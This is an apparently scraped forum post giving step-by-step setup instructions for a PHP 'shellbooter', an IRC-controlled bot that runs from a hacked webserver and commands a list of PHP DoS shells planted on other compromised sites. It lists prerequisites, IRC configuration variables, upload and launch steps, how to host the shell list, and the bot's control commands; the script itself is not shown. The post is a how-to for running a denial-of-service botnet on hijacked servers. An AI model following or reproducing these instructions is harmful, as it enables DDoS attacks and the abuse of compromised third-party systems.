Bài liên quan
Webserver/Server (hacked) with php engine PHP functions which are not blocked: 
Access to an IRC Server/channel (can be a public one) 
PHP DoS Shells 
My php script 

How to set it up: 
1. Copy the script (at the end of this thread) and put it into an editor. 
2. Configure the following things in your editor to your IRC Server:

$IRC_SERVER  = "irc.server.com";
$IRC_PORT  = "6667";
$IRC_CHANNEL    = "#channel";
$IRC_MASTERPASS = "password"; 

3. Save the file as shellbooter.php (can be named to anything you want) 
4. Upload the file to your server 
5. Run the script by visiting the website in your browser ( http://exampleserver.com/shellbooter.php ) -> The booter will join your IRC Server/Channel 
6. Check your channel on your IRC Server for the booter. 

Setting up your list of shells: Put all your shells into a .txt file like this: 
http://www.server3.info/somefolder/maybe/shell.php and upload it somewhere, where you can directly access it. For example with dropbox. 

How to control it: You can control the booter with the following commands: 
!join -> Join Channel
!part -> Leave Channel
!kill -> Kills the bot
!getlist -> Gets the list of shells

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